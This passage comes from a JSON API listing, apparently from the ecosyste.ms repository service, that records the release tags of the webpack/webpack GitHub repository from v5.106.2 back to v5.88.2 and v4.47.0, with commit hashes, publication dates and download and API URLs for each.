ull,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.